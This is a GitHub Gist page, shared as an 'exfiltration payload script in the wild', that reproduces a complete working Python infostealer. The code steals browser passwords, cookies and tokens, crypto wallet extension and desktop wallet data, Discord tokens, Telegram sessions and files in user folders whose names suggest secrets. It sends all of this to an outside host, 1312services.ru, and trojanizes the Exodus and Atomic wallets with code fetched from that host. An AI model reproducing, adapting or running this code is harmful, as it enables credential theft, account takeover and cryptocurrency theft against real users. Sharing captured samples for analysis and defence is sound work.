-
-
Save kcnaiamh/ad72bf34957eaf3c144f8a0899233128 to your computer and use it in GitHub Desktop.
An exfiltration payload script in the wild!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| import json | |
| import os | |
| import re | |
| import sqlite3 | |
| import shutil | |
| import subprocess | |
| import zipfile | |
| import sys | |
| from zipfile import ZipFile | |
| from urllib.request import Request, urlopen | |
| import time | |
| userid = "14" | |
| CURRENT_INTERPRETER = sys.executable | |
| proc = subprocess.Popen([CURRENT_INTERPRETER, "-m", "pip", "install", "pycryptodome", "pypiwin32", "pywin32","requests", "websocket-client"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,creationflags=subprocess.CREATE_NO_WINDOW) | |
| proc.wait() | |
| try: | |
| import win32crypt | |
| from Crypto.Cipher import AES | |
| import requests | |
| import websocket | |
| except: | |
| current_file = os.path.abspath(__file__) | |
| subprocess.Popen([CURRENT_INTERPRETER, current_file], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,creationflags=subprocess.CREATE_NO_WINDOW) | |
| exit() | |
| USER_PROFILE = os.getenv('USERPROFILE') | |
| APPDATA = os.getenv('APPDATA') | |
| LOCALAPPDATA = os.getenv('LOCALAPPDATA') | |
| STORAGE_PATH = APPDATA + "\\gruppe_storage" | |
| STARTUP_PATH = os.path.join(APPDATA, "Microsoft", "Windows", "Start Menu", "Programs", "Startup") | |
| if not os.path.exists(STORAGE_PATH): | |
| os.makedirs(STORAGE_PATH) | |
| CHROMIUM_BROWSERS = [ | |
| {"name": "Google Chrome", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data"), "taskname": "chrome.exe"}, | |
| {"name": "Microsoft Edge", "path": os.path.join(LOCALAPPDATA, "Microsoft", "Edge", "User Data"), "taskname": "msedge.exe"}, | |
| {"name": "Opera", "path": os.path.join(APPDATA, "Opera Software", "Opera Stable"), "taskname": "opera.exe"}, | |
| {"name": "Opera GX", "path": os.path.join(APPDATA, "Opera Software", "Opera GX Stable"), "taskname": "opera.exe"}, | |
| {"name": "Brave", "path": os.path.join(LOCALAPPDATA, "BraveSoftware", "Brave-Browser", "User Data"), "taskname": "brave.exe"}, | |
| {"name": "Yandex", "path": os.path.join(APPDATA, "Yandex", "YandexBrowser", "User Data"), "taskname": "yandex.exe"}, | |
| ] | |
| CHROMIUM_SUBPATHS = [ | |
| {"name": "None", "path": ""}, | |
| {"name": "Default", "path": "Default"}, | |
| {"name": "Profile 1", "path": "Profile 1"}, | |
| {"name": "Profile 2", "path": "Profile 2"}, | |
| {"name": "Profile 3", "path": "Profile 3"}, | |
| {"name": "Profile 4", "path": "Profile 4"}, | |
| {"name": "Profile 5", "path": "Profile 5"}, | |
| ] | |
| BROWSER_EXTENSIONS = [ | |
| {"name": "Authenticator", "path": "\\Local Extension Settings\\bhghoamapcdpbohphigoooaddinpkbai"}, | |
| {"name": "Binance", "path": "\\Local Extension Settings\\fhbohimaelbohpjbbldcngcnapndodjp"}, | |
| {"name": "Bitapp", "path": "\\Local Extension Settings\\fihkakfobkmkjojpchpfgcmhfjnmnfpi"}, | |
| {"name": "BoltX", "path": "\\Local Extension Settings\\aodkkagnadcbobfpggfnjeongemjbjca"}, | |
| {"name": "Coin98", "path": "\\Local Extension Settings\\aeachknmefphepccionboohckonoeemg"}, | |
| {"name": "Coinbase", "path": "\\Local Extension Settings\\hnfanknocfeofbddgcijnmhnfnkdnaad"}, | |
| {"name": "Core", "path": "\\Local Extension Settings\\agoakfejjabomempkjlepdflaleeobhb"}, | |
| {"name": "Crocobit", "path": "\\Local Extension Settings\\pnlfjmlcjdjgkddecgincndfgegkecke"}, | |
| {"name": "Equal", "path": "\\Local Extension Settings\\blnieiiffboillknjnepogjhkgnoapac"}, | |
| {"name": "Ever", "path": "\\Local Extension Settings\\cgeeodpfagjceefieflmdfphplkenlfk"}, | |
| {"name": "ExodusWeb3", "path": "\\Local Extension Settings\\aholpfdialjgjfhomihkjbmgjidlcdno"}, | |
| {"name": "Fewcha", "path": "\\Local Extension Settings\\ebfidpplhabeedpnhjnobghokpiioolj"}, | |
| {"name": "Finnie", "path": "\\Local Extension Settings\\cjmkndjhnagcfbpiemnkdpomccnjblmj"}, | |
| {"name": "Guarda", "path": "\\Local Extension Settings\\hpglfhgfnhbgpjdenjgmdgoeiappafln"}, | |
| {"name": "Guild", "path": "\\Local Extension Settings\\nanjmdknhkinifnkgdcggcfnhdaammmj"}, | |
| {"name": "HarmonyOutdated", "path": "\\Local Extension Settings\\fnnegphlobjdpkhecapkijjdkgcjhkib"}, | |
| {"name": "Iconex", "path": "\\Local Extension Settings\\flpiciilemghbmfalicajoolhkkenfel"}, | |
| {"name": "Jaxx Liberty", "path": "\\Local Extension Settings\\cjelfplplebdjjenllpjcblmjkfcffne"}, | |
| {"name": "Kaikas", "path": "\\Local Extension Settings\\jblndlipeogpafnldhgmapagcccfchpi"}, | |
| {"name": "KardiaChain", "path": "\\Local Extension Settings\\pdadjkfkgcafgbceimcpbkalnfnepbnk"}, | |
| {"name": "Keplr", "path": "\\Local Extension Settings\\dmkamcknogkgcdfhhbddcghachkejeap"}, | |
| {"name": "Liquality", "path": "\\Local Extension Settings\\kpfopkelmapcoipemfendmdcghnegimn"}, | |
| {"name": "MEWCX", "path": "\\Local Extension Settings\\nlbmnnijcnlegkjjpcfjclmcfggfefdm"}, | |
| {"name": "MaiarDEFI", "path": "\\Local Extension Settings\\dngmlblcodfobpdpecaadgfbcggfjfnm"}, | |
| {"name": "Martian", "path": "\\Local Extension Settings\\efbglgofoippbgcjepnhiblaibcnclgk"}, | |
| {"name": "Math", "path": "\\Local Extension Settings\\afbcbjpbpfadlkmhmclhkeeodmamcflc"}, | |
| {"name": "Metamask", "path": "\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"}, | |
| {"name": "Metamask2", "path": "\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm"}, | |
| {"name": "Mobox", "path": "\\Local Extension Settings\\fcckkdbjnoikooededlapcalpionmalo"}, | |
| {"name": "Nami", "path": "\\Local Extension Settings\\lpfcbjknijpeeillifnkikgncikgfhdo"}, | |
| {"name": "Nifty", "path": "\\Local Extension Settings\\jbdaocneiiinmjbjlgalhcelgbejmnid"}, | |
| {"name": "Oxygen", "path": "\\Local Extension Settings\\fhilaheimglignddkjgofkcbgekhenbh"}, | |
| {"name": "PaliWallet", "path": "\\Local Extension Settings\\mgffkfbidihjpoaomajlbgchddlicgpn"}, | |
| {"name": "Petra", "path": "\\Local Extension Settings\\ejjladinnckdgjemekebdpeokbikhfci"}, | |
| {"name": "Phantom", "path": "\\Local Extension Settings\\bfnaelmomeimhlpmgjnjophhpkkoljpa"}, | |
| {"name": "Pontem", "path": "\\Local Extension Settings\\phkbamefinggmakgklpkljjmgibohnba"}, | |
| {"name": "Ronin", "path": "\\Local Extension Settings\\fnjhmkhhmkbjkkabndcnnogagogbneec"}, | |
| {"name": "Safepal", "path": "\\Local Extension Settings\\lgmpcpglpngdoalbgeoldeajfclnhafa"}, | |
| {"name": "Saturn", "path": "\\Local Extension Settings\\nkddgncdjgjfcddamfgcmfnlhccnimig"}, | |
| {"name": "Slope", "path": "\\Local Extension Settings\\pocmplpaccanhmnllbbkpgfliimjljgo"}, | |
| {"name": "Solfare", "path": "\\Local Extension Settings\\bhhhlbepdkbapadjdnnojkbgioiodbic"}, | |
| {"name": "Sollet", "path": "\\Local Extension Settings\\fhmfendgdocmcbmfikdcogofphimnkno"}, | |
| {"name": "Starcoin", "path": "\\Local Extension Settings\\mfhbebgoclkghebffdldpobeajmbecfk"}, | |
| {"name": "Swash", "path": "\\Local Extension Settings\\cmndjbecilbocjfkibfbifhngkdmjgog"}, | |
| {"name": "TempleTezos", "path": "\\Local Extension Settings\\ookjlbkiijinhpmnjffcofjonbfbgaoc"}, | |
| {"name": "TerraStation", "path": "\\Local Extension Settings\\aiifbnbfobpmeekipheeijimdpnlpgpp"}, | |
| {"name": "Tokenpocket", "path": "\\Local Extension Settings\\mfgccjchihfkkindfppnaooecgfneiii"}, | |
| {"name": "Ton", "path": "\\Local Extension Settings\\nphplpgoakhhjchkkhmiggakijnkhfnd"}, | |
| {"name": "Tron", "path": "\\Local Extension Settings\\ibnejdfjmmkpcnlpebklmnkoeoihofec"}, | |
| {"name": "Trust Wallet", "path": "\\Local Extension Settings\\egjidjbpglichdcondbcbdnbeeppgdph"}, | |
| {"name": "Wombat", "path": "\\Local Extension Settings\\amkmjjmmflddogmhpjloimipbofnfjih"}, | |
| {"name": "XDEFI", "path": "\\Local Extension Settings\\hmeobnfnfcmdkdcmlblgagmfpfboieaf"}, | |
| {"name": "XMR.PT", "path": "\\Local Extension Settings\\eigblbgjknlfbajkfhopmcojidlgcehm"}, | |
| {"name": "XinPay", "path": "\\Local Extension Settings\\bocpokimicclpaiekenaeelehdjllofo"}, | |
| {"name": "Yoroi", "path": "\\Local Extension Settings\\ffnbelfdoeiohenkjibnmadjiehjhajb"}, | |
| {"name": "iWallet", "path": "\\Local Extension Settings\\kncchdigobghenbbaddojjnnaogfppfj"} | |
| ] | |
| WALLET_PATHS = [ | |
| {"name": "Atomic", "path": os.path.join(APPDATA, "atomic", "Local Storage", "leveldb")}, | |
| {"name": "Exodus", "path": os.path.join(APPDATA, "Exodus", "exodus.wallet")}, | |
| {"name": "Electrum", "path": os.path.join(APPDATA, "Electrum", "wallets")}, | |
| {"name": "Electrum-LTC", "path": os.path.join(APPDATA, "Electrum-LTC", "wallets")}, | |
| {"name": "Zcash", "path": os.path.join(APPDATA, "Zcash")}, | |
| {"name": "Armory", "path": os.path.join(APPDATA, "Armory")}, | |
| {"name": "Bytecoin", "path": os.path.join(APPDATA, "bytecoin")}, | |
| {"name": "Jaxx", "path": os.path.join(APPDATA, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb")}, | |
| {"name": "Etherium", "path": os.path.join(APPDATA, "Ethereum", "keystore")}, | |
| {"name": "Guarda", "path": os.path.join(APPDATA, "Guarda", "Local Storage", "leveldb")}, | |
| {"name": "Coinomi", "path": os.path.join(APPDATA, "Coinomi", "Coinomi", "wallets")}, | |
| ] | |
| PATHS_TO_SEARCH = [ | |
| USER_PROFILE + "\\Desktop", | |
| USER_PROFILE + "\\Documents", | |
| USER_PROFILE + "\\Downloads", | |
| USER_PROFILE + "\\OneDrive\\Documents", | |
| USER_PROFILE + "\\OneDrive\\Desktop", | |
| ] | |
| FILE_KEYWORDS = [ | |
| "passw", | |
| "mdp", | |
| "motdepasse", | |
| "mot_de_passe", | |
| "login", | |
| "secret", | |
| "account", | |
| "acount", | |
| "paypal", | |
| "banque", | |
| "metamask", | |
| "wallet", | |
| "crypto", | |
| "exodus", | |
| "discord", | |
| "2fa", | |
| "code", | |
| "memo", | |
| "compte", | |
| "token", | |
| "backup", | |
| "seecret" | |
| ] | |
| ALLOWED_EXTENSIONS = [ | |
| ".txt", | |
| ".log", | |
| ".doc", | |
| ".docx", | |
| ".xls", | |
| ".xlsx", | |
| ".ppt", | |
| ".pptx", | |
| ".odt", | |
| ".pdf", | |
| ".rtf", | |
| ".json", | |
| ".csv", | |
| ".db", | |
| ".jpg", | |
| ".jpeg", | |
| ".png", | |
| ".gif", | |
| ".webp", | |
| ".mp4" | |
| ] | |
| DISCORD_PATHS = [ | |
| {"name": "Discord", "path": os.path.join(APPDATA, "discord", "Local Storage", "leveldb")}, | |
| {"name": "Discord Canary", "path": os.path.join(APPDATA, "discordcanary", "Local Storage", "leveldb")}, | |
| {"name": "Discord PTB", "path": os.path.join(APPDATA, "discordptb", "Local Storage", "leveldb")}, | |
| {"name": "Opera", "path": os.path.join(APPDATA, "Opera Software", "Opera Stable", "Local Storage", "leveldb")}, | |
| {"name": "Opera GX", "path": os.path.join(APPDATA, "Opera Software", "Opera GX Stable", "Local Storage", "leveldb")}, | |
| {"name": "Amigo", "path": os.path.join(LOCALAPPDATA, "Amigo", "User Data", "Local Storage", "leveldb")}, | |
| {"name": "Torch", "path": os.path.join(LOCALAPPDATA, "Torch", "User Data", "Local Storage", "leveldb")}, | |
| {"name": "Kometa", "path": os.path.join(LOCALAPPDATA, "Kometa", "User Data", "Local Storage", "leveldb")}, | |
| {"name": "Orbitum", "path": os.path.join(LOCALAPPDATA, "Orbitum", "User Data", "Local Storage", "leveldb")}, | |
| {"name": "CentBrowser", "path": os.path.join(LOCALAPPDATA, "CentBrowser", "User Data", "Local Storage", "leveldb")}, | |
| {"name": "7Star", "path": os.path.join(LOCALAPPDATA, "7Star", "7Star", "User Data", "Local Storage", "leveldb")}, | |
| {"name": "Sputnik", "path": os.path.join(LOCALAPPDATA, "Sputnik", "Sputnik", "User Data", "Local Storage", "leveldb")}, | |
| {"name": "Vivaldi", "path": os.path.join(LOCALAPPDATA, "Vivaldi", "User Data", "Default", "Local Storage", "leveldb")}, | |
| {"name": "Chrome SxS", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome SxS", "User Data", "Local Storage", "leveldb")}, | |
| {"name": "Chrome", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Default", "Local Storage", "leveldb")}, | |
| {"name": "Chrome1", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 1", "Local Storage", "leveldb")}, | |
| {"name": "Chrome2", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 2", "Local Storage", "leveldb")}, | |
| {"name": "Chrome3", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 3", "Local Storage", "leveldb")}, | |
| {"name": "Chrome4", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 4", "Local Storage", "leveldb")}, | |
| {"name": "Chrome5", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 5", "Local Storage", "leveldb")}, | |
| {"name": "Epic Privacy Browser", "path": os.path.join(LOCALAPPDATA, "Epic Privacy Browser", "User Data", "Local Storage", "leveldb")}, | |
| {"name": "Microsoft Edge", "path": os.path.join(LOCALAPPDATA, "Microsoft", "Edge", "User Data", "Default", "Local Storage", "leveldb")}, | |
| {"name": "Uran", "path": os.path.join(LOCALAPPDATA, "uCozMedia", "Uran", "User Data", "Default", "Local Storage", "leveldb")}, | |
| {"name": "Yandex", "path": os.path.join(LOCALAPPDATA, "Yandex", "YandexBrowser", "User Data", "Default", "Local Storage", "leveldb")}, | |
| {"name": "Brave", "path": os.path.join(LOCALAPPDATA, "BraveSoftware", "Brave-Browser", "User Data", "Default", "Local Storage", "leveldb")}, | |
| {"name": "Iridium", "path": os.path.join(LOCALAPPDATA, "Iridium", "User Data", "Default", "Local Storage", "leveldb")} | |
| ] | |
| DISCORD_TOKENS = [] | |
| PASSWORDS = [] | |
| COOKIES = [] | |
| WEB_DATA = [] | |
| DISCORD_IDS = [] | |
| def decrypt_data(data, key): | |
| try: | |
| iv = data[3:15] | |
| data = data[15:] | |
| cipher = AES.new(key, AES.MODE_GCM, iv) | |
| return cipher.decrypt(data)[:-16].decode() | |
| except: | |
| return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) | |
| def zip_to_storage(name, source, destination): | |
| if os.path.isfile(source): | |
| with zipfile.ZipFile(destination + f"\\{name}.zip", "w") as z: | |
| z.write(source, os.path.basename(source)) | |
| else: | |
| with zipfile.ZipFile(destination + f"\\{name}.zip", "w") as z: | |
| for root, dirs, files in os.walk(source): | |
| for file in files: | |
| z.write(os.path.join(root, file), os.path.relpath(os.path.join(root, file), os.path.join(source, '..'))) | |
| def upload_to_server(filepath): | |
| for i in range(10): | |
| try: | |
| url = "https://1312services.ru/delivery" | |
| files = {'file': open(filepath, 'rb')} | |
| headers = {'userid': userid} | |
| r = requests.post(url, files=files, headers = headers) | |
| if r.status_code == 200: | |
| break | |
| except: pass | |
| def validate_discord_token(token): | |
| r = requests.get("https://discord.com/api/v9/users/@me", headers={"Authorization": token}) | |
| if r.status_code == 200: | |
| return r.json() | |
| else: | |
| return None | |
| def taskkill(taskname): | |
| subprocess.run(["taskkill", "/F", "/IM", taskname], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) | |
| def inject(): | |
| procc = "exodus.exe" | |
| local = os.getenv("localappdata") | |
| path = f"{local}/exodus" | |
| if not os.path.exists(path): return | |
| listOfFile = os.listdir(path) | |
| apps = [] | |
| for file in listOfFile: | |
| if "app-" in file: | |
| apps += [file] | |
| exodusPatchURL = "https://1312services.ru/wallet" | |
| headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36"} | |
| req = Request(exodusPatchURL, headers=headers) | |
| response = urlopen(req) | |
| data = response.read() | |
| subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True) | |
| for app in apps: | |
| try: | |
| fullpath = f"{path}/{app}/resources/app.asar" | |
| with open(fullpath, 'wb') as out_file1: | |
| out_file1.write(data) | |
| licensepath = f"{path}/{app}/LICENSE" | |
| with open(licensepath, "w") as out_file2: | |
| out_file2.write(userid) | |
| except: pass | |
| for i in range(10): | |
| try: | |
| inject() | |
| break | |
| except: pass | |
| def inject_atomic(): | |
| procc = "Atomic Wallet.exe" | |
| local = os.getenv("localappdata") | |
| path = f"{local}/Programs/atomic" | |
| if not os.path.exists(path): return | |
| atomicPatchURL = "https://1312services.ru/wallet/atomic" | |
| headers = {"User-Agent": "Mozilla/5.0"} | |
| req = Request(atomicPatchURL, headers=headers) | |
| response = urlopen(req) | |
| data = response.read() | |
| subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True) | |
| try: | |
| fullpath = f"{path}/resources/app.asar" | |
| with open(fullpath, 'wb') as out_file1: | |
| out_file1.write(data) | |
| licensepath = f"{path}/LICENSE.electron.txt" | |
| with open(licensepath, "w") as out_file2: | |
| out_file2.write(userid) | |
| except: pass | |
| for i in range(10): | |
| try: | |
| inject_atomic() | |
| break | |
| except: pass | |
| for browser in CHROMIUM_BROWSERS: | |
| taskkill(browser["taskname"]) | |
| local_state = os.path.join(browser["path"], "Local State") | |
| if not os.path.exists(local_state): continue | |
| with open(local_state, "r", encoding="utf-8") as f: | |
| local_state = json.loads(f.read()) | |
| key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:] | |
| try: | |
| decryption_key = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] | |
| except: | |
| pass | |
| for subpath in CHROMIUM_SUBPATHS: | |
| if not os.path.exists(os.path.join(browser["path"], subpath["path"])): continue | |
| try: | |
| login_data_file = os.path.join(browser["path"], subpath["path"], "Login Data") | |
| temp_db = os.path.join(browser["path"], subpath["path"], f"{browser['name']}-pw.db") | |
| shutil.copy(login_data_file, temp_db) | |
| connection = sqlite3.connect(temp_db) | |
| cursor = connection.cursor() | |
| cursor.execute("SELECT origin_url, username_value, password_value FROM logins") | |
| for row in cursor.fetchall(): | |
| origin_url = row[0] | |
| username = row[1] | |
| password = decrypt_data(row[2], decryption_key) | |
| if username or password: | |
| PASSWORDS.append({"browser": browser["name"], "profile": subpath["name"], "url": origin_url, "username": username, "password": password}) | |
| cursor.close() | |
| connection.close() | |
| os.remove(temp_db) | |
| except: | |
| pass | |
| try: | |
| cookies_file = os.path.join(browser["path"], subpath["path"], "Network", "Cookies") | |
| temp_db = os.path.join(browser["path"], subpath["path"], "Network", f"{browser['name']}-ck.db") | |
| shutil.copy(cookies_file, temp_db) | |
| connection = sqlite3.connect(temp_db) | |
| cursor = connection.cursor() | |
| cursor.execute("SELECT host_key, name, encrypted_value FROM cookies") | |
| cookie_str = "" | |
| for row in cursor.fetchall(): | |
| host = row[0] | |
| name = row[1] | |
| value = decrypt_data(row[2], decryption_key) | |
| cookie_str += f"{host}\tTRUE\t/\tFALSE\t13355861278849698\t{name}\t{value}\n" | |
| COOKIES.append({"browser": browser["name"], "profile": subpath["name"], "cookies": base64.b64encode(cookie_str.encode()).decode()}) | |
| cursor.close() | |
| connection.close() | |
| os.remove(temp_db) | |
| except: | |
| pass | |
| try: | |
| web_data_file = os.path.join(browser["path"], subpath["path"], "Web Data") | |
| temp_db = os.path.join(browser["path"], subpath["path"], f"{browser['name']}-webdata.db") | |
| shutil.copy(web_data_file, temp_db) | |
| connection = sqlite3.connect(temp_db) | |
| cursor = connection.cursor() | |
| cursor.execute("SELECT service, encrypted_token FROM token_service") | |
| for row in cursor.fetchall(): | |
| web_service = row[0] | |
| web_token = decrypt_data(row[1], decryption_key) | |
| WEB_DATA.append({"browser": browser["name"], "profile": subpath["name"], "service": web_service, "token": web_token}) | |
| cursor.close() | |
| connection.close() | |
| os.remove(temp_db) | |
| except: | |
| pass | |
| for extension in BROWSER_EXTENSIONS: | |
| extension_path = os.path.join(browser["path"], subpath["path"]) + extension["path"] | |
| if os.path.exists(extension_path): | |
| try: | |
| zip_to_storage(f"{browser['name']}-{subpath['name']}-{extension['name']}", extension_path, STORAGE_PATH) | |
| except: | |
| pass | |
| firefox_path = os.path.join(APPDATA, 'Mozilla', 'Firefox', 'Profiles') | |
| if os.path.exists(firefox_path): | |
| taskkill("firefox.exe") | |
| for profile in os.listdir(firefox_path): | |
| try: | |
| if profile.endswith('.default') or profile.endswith('.default-release'): | |
| profile_path = os.path.join(firefox_path, profile) | |
| if os.path.exists(os.path.join(profile_path, "cookies.sqlite")): | |
| shutil.copy(os.path.join(profile_path, "cookies.sqlite"), os.path.join(profile_path, "cookies-copy.sqlite")) | |
| connection = sqlite3.connect(os.path.join(profile_path, "cookies-copy.sqlite")) | |
| cursor = connection.cursor() | |
| cursor.execute("SELECT host, name, value FROM moz_cookies") | |
| cookie_str = "" | |
| for row in cursor.fetchall(): | |
| host, name, value = row | |
| cookie_str += f"{host}\tTRUE\t/\tFALSE\t13355861278849698\t{name}\t{value}\n" | |
| COOKIES.append({"browser": "Firefox", "profile": profile, "cookies": base64.b64encode(cookie_str.encode()).decode()}) | |
| cursor.close() | |
| connection.close() | |
| os.remove(os.path.join(profile_path, "cookies-copy.sqlite")) | |
| except: | |
| continue | |
| for wallet_file in WALLET_PATHS: | |
| if os.path.exists(wallet_file["path"]): | |
| try: | |
| zip_to_storage(wallet_file["name"], wallet_file["path"], STORAGE_PATH) | |
| except: | |
| pass | |
| for discord_path in DISCORD_PATHS: | |
| if not os.path.exists(discord_path["path"]): continue | |
| try: | |
| name_without_spaces = discord_path["name"].replace(" ", "") | |
| if "cord" in discord_path["path"]: | |
| if not os.path.exists(APPDATA + f"\\{name_without_spaces}\\Local State"): continue | |
| try: | |
| with open(APPDATA + f"\\{name_without_spaces}\\Local State", "r", encoding="utf-8") as f: | |
| local_state = json.loads(f.read()) | |
| key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:] | |
| decryption_key = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] | |
| for file_name in os.listdir(discord_path["path"]): | |
| if file_name[-3:] not in ["ldb", "log"]: continue | |
| for line in [x.strip() for x in open(f'{discord_path["path"]}\\{file_name}', errors='ignore').readlines() if x.strip()]: | |
| for y in re.findall(r"dQw4w9WgXcQ:[^\"]*", line): | |
| token = decrypt_data(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), decryption_key) | |
| token_data = validate_discord_token(token) | |
| if token_data: | |
| if token_data["id"] not in DISCORD_IDS: | |
| DISCORD_IDS.append(token_data["id"]) | |
| username = token_data["username"] if token_data["discriminator"] == "0" else f"{token_data['username']}#{token_data['discriminator']}" | |
| phone_number = token_data["phone"] if token_data["phone"] else "Not linked" | |
| DISCORD_TOKENS.append( | |
| {"token": token, "user_id": token_data["id"], "username": username, | |
| "display_name": token_data["global_name"], "email": token_data["email"], | |
| "phone": phone_number}) | |
| except: | |
| pass | |
| else: | |
| for file_name in os.listdir(discord_path["path"]): | |
| if file_name[-3:] not in ["ldb", "log"]: continue | |
| for line in [x.strip() for x in open(f'{discord_path["path"]}\\{file_name}', errors='ignore').readlines() if x.strip()]: | |
| for token in re.findall(r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", line): | |
| token_data = validate_discord_token(token) | |
| if token_data: | |
| if token_data["id"] not in DISCORD_IDS: | |
| DISCORD_IDS.append(token_data["id"]) | |
| username = token_data["username"] if token_data["discriminator"] == "0" else f"{token_data['username']}#{token_data['discriminator']}" | |
| phone_number = token_data["phone"] if token_data["phone"] else "Not linked" | |
| DISCORD_TOKENS.append( | |
| {"token": token, "user_id": token_data["id"], "username": username, | |
| "display_name": token_data["global_name"], "email": token_data["email"], | |
| "phone": phone_number}) | |
| except: | |
| pass | |
| password_headers = {"userid": userid, "Content-Type": "application/json"} | |
| password_json_data = json.dumps(PASSWORDS) | |
| requests.post("https://1312services.ru/pw", data=password_json_data, headers=password_headers) | |
| for cookie in COOKIES: | |
| with open(STORAGE_PATH + f"\\Cookies-{cookie['browser']}-{cookie['profile']}.txt", "w") as f: | |
| f.write(base64.b64decode(cookie["cookies"]).decode()) | |
| web_data_headers = {"userid": userid, "Content-Type": "application/json"} | |
| web_data_json = json.dumps(WEB_DATA) | |
| requests.post("https://1312services.ru/webdata", data=web_data_json, headers=web_data_headers) | |
| for discord_token in DISCORD_TOKENS: | |
| with open(STORAGE_PATH + "\\discord-tokens.txt", "w") as f: | |
| f.write( | |
| f"\n{'-' * 50}\n".join([ | |
| f"ID: {discord_token['user_id']}\n" | |
| f"USERNAME: {discord_token['username']}\n" | |
| f"DISPLAY NAME: {discord_token['display_name']}\n" | |
| f"EMAIL: {discord_token['email']}\n" | |
| f"PHONE: {discord_token['phone']}\n" | |
| f"TOKEN: {discord_token['token']}" | |
| for discord_token in DISCORD_TOKENS | |
| ]) | |
| ) | |
| try: | |
| chrome_path = None | |
| if os.path.exists("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"): | |
| chrome_path = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" | |
| elif os.path.exists("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"): | |
| chrome_path = "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" | |
| if chrome_path is not None: | |
| for profile in ["Default", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5"]: | |
| if os.path.exists(LOCALAPPDATA + f"\\Google\\Chrome\\User Data\\{profile}"): | |
| taskkill("chrome.exe") | |
| strtcmd = f'"{chrome_path}" --window-position=-2400,-2400 --remote-debugging-port=9222 --remote-allow-origins=* --profile-directory="{profile}"' | |
| subprocess.Popen(strtcmd, creationflags=subprocess.CREATE_NEW_CONSOLE, close_fds=True) | |
| targets = requests.get("http://localhost:9222/json").json() | |
| ws_url = targets[0]["webSocketDebuggerUrl"] | |
| ws = websocket.create_connection(ws_url) | |
| payload = { | |
| "id": 1, | |
| "method": "Storage.getCookies", | |
| "params": {} | |
| } | |
| ws.send(json.dumps(payload)) | |
| cookie_str = "" | |
| for cookie in json.loads(ws.recv())["result"]["cookies"]: | |
| cookie_str += f"{cookie['domain']}\tTRUE\t/\tFALSE\t13355861278849698\t{cookie['name']}\t{cookie['value']}\n" | |
| with open(STORAGE_PATH + f"\\Cookies-Chrome-New-{profile}.txt", "w") as f: | |
| f.write(cookie_str) | |
| ws.close() | |
| taskkill("chrome.exe") | |
| except: | |
| pass | |
| for file_to_upload in os.listdir(STORAGE_PATH): | |
| try: | |
| upload_to_server(STORAGE_PATH + "\\" + file_to_upload) | |
| except: | |
| pass | |
| for path in PATHS_TO_SEARCH: | |
| for root, _, files in os.walk(path): | |
| for file_name in files: | |
| for keyword in FILE_KEYWORDS: | |
| if keyword in file_name.lower(): | |
| for extension in ALLOWED_EXTENSIONS: | |
| if file_name.endswith(extension): | |
| try: | |
| upload_to_server(os.path.join(root, file_name)) | |
| except: | |
| pass | |
| def kill_process(process_name): | |
| # Uses os.system to call taskkill, Windows-specific command | |
| result = subprocess.Popen(f"taskkill /im {process_name} /t /f >nul 2>&1", shell=True) | |
| def copy_directory(src, dst): | |
| if not os.path.exists(dst): | |
| os.makedirs(dst) | |
| for item in os.listdir(src): | |
| src_path = os.path.join(src, item) | |
| dst_path = os.path.join(dst, item) | |
| if os.path.isdir(src_path): | |
| copy_directory(src_path, dst_path) | |
| else: | |
| with open(src_path, 'rb') as f_read, open(dst_path, 'wb') as f_write: | |
| f_write.write(f_read.read()) | |
| def remove_directory(dir_path): | |
| for item in os.listdir(dir_path): | |
| path = os.path.join(dir_path, item) | |
| if os.path.isdir(path): | |
| remove_directory(path) | |
| else: | |
| os.remove(path) | |
| os.rmdir(dir_path) | |
| def telegram(): | |
| try: | |
| kill_process("Telegram.exe") | |
| except: | |
| pass | |
| user = os.path.expanduser("~") | |
| source_path = os.path.join(user, "AppData\\Roaming\\Telegram Desktop\\tdata") | |
| temp_path = os.path.join(user, "AppData\\Local\\Temp\\tdata_session") | |
| zip_path = os.path.join(user, "AppData\\Local\\Temp", "tdata_session.zip") | |
| if os.path.exists(source_path): | |
| if os.path.exists(temp_path): | |
| remove_directory(temp_path) | |
| copy_directory(source_path, temp_path) | |
| with ZipFile(zip_path, 'w') as zipf: | |
| for root, dirs, files in os.walk(temp_path): | |
| for file in files: | |
| file_path = os.path.join(root, file) | |
| zipf.write(file_path, os.path.relpath(file_path, os.path.join(temp_path, '..'))) | |
| with open(zip_path, 'rb') as f: | |
| files = {'file': ('tdata_session.zip', f)} | |
| headers ={"userid": userid} | |
| response = requests.post("https://1312services.ru/delivery", files=files, headers=headers) | |
| os.remove(zip_path) | |
| remove_directory(temp_path) | |
| try: | |
| telegram() | |
| except: | |
